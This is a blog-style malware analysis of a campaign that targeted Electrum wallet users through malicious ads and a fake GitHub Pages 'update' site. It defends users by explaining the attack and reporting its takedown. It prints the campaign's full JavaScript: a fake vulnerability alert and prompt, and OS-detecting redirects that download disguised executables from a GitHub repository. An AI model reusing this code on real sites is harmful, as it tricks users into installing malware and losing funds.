Back
writeup campaign

Electrum Malware Campaign

Write-up on a new malware campaign targeting users of Electrum, a Bitcoin wallet, which emerged primarily on February 22nd

Targeting

The main method of targetting users seems to be via a malicious Google Ads campaign. The main site where users seem to be encountering this is Reddit, as seen in this Reddit thread posted. This seems to be executing JS to make an alert telling users to update Electrum and making an executable download via opening another browser (we will talk about how later in the HTML code review). This can be seen in the apparent content of the alert as said in the Reddit thread:

Electrum versions older than 4.0.9 have a vulnerability. Please update Electrum to avoid losing funds.

However, the thread is especially useful as the pasted text includes the origin of the iframe: (with escaped URL)

An embedded page at electrum-4[dot]github[dot]io says:

The site

As apparent from the url of the site, it is a GitHub Pages site. GitHub Pages allows GitHub, a public Git hosting provider (among other services and features), users a way to easily host their repositories online with subdomains under “[username].github.io”.

The GitHub user

As it is GitHub Pages, this means the repository could be public, but depends on the how the user set it up. In this instance, by looking at the user’s page, finding it by just plugging it into “github.com/[username]” from the GitHub Pages subdomain, we can see the repository is open source and public.

The site’s source

index.html

The index page has a simple user interface, a loading animation. But we are more interested in the JS running in the background. The JS running is quite small, here is the entire source:

if (navigator.userAgent.indexOf('Mac OS') != -1) {
	top.location.href = 'https://raw.githubusercontent.com/electrum-4/electrum/main/electrum-4.0.9.dmg';
} else {
	top.location.href = 'https://raw.githubusercontent.com/electrum-4/electrum/main/electrum-4.0.9-setup.exe';
}

setTimeout(function () {
	window.location.href = "https://electrum.org/";
}, 7000);

A small step-by-step analysis:

  • Detect if the website is being ran on a Mac OS device:
    • If so: download a .dmg file
    • If not: download a .exe file
  • After 7 seconds redirect to the official Electrum site

electrum.html

I am pretty sure this is the HTML which is inside the iframe which ran. It is very similar to the index.html in concept, however without the UI and with different download methods.

The JavaScript (ran via script):

if (navigator && (navigator.userAgent.indexOf("Windows") > -1)) {
	alert("\n\nElectrum versions older than 4.0.9 have a vulnerability. Please update Electrum to avoid losing funds.\n\n");
	location.href = 'microsoft-edge:https://electrum-4.github.io/';
} else if (navigator && (navigator.userAgent.indexOf("Mac OS") > -1)) {
	prompt("\n\nElectrum versions older than 4.0.9 have a vulnerability. Please update Electrum to avoid losing funds.\n\nCopy the following URL and paste it to your browser address bar:\n", "https://electrum-4.github.io/");
}

Another small step-by-step analysis:

  • If on Windows:
    • Alert the user to trick them into downloading and running the malicious executable
    • Try and download it by attempting to open Microsoft Edge with the link to the main index page
  • Else, if on Mac OS:
    • Make a prompt to try and get the user to open the main index page into their browser

The binaries

The binaries are stored in another GitHub repo under the same user (electrum-4/electrum), as the JS in the site uses a raw GitHub URL (a way of accessing a file in a GitHub repo directly via a URL) to download the binaries. I will not go into the actual binaries here as I am not experienced with that side.

Final Notes

I have contacted GitHub with a link to this writeup to attempt to get the user / repos taken down to prevent further users from being attacked. Thanks.

Trivia / Extra Info

  • Whilst the GitHub Pages repo is committed via the GitHub user, the actual repo with the binaries has commits made by the author root <root@vps.server.local>

Update (18:20 UTC)

GitHub has now taken the user down, resulting in the binaries no longer being hosted and the GitHub Pages site now no longer being online, meaning no new users can be attacked.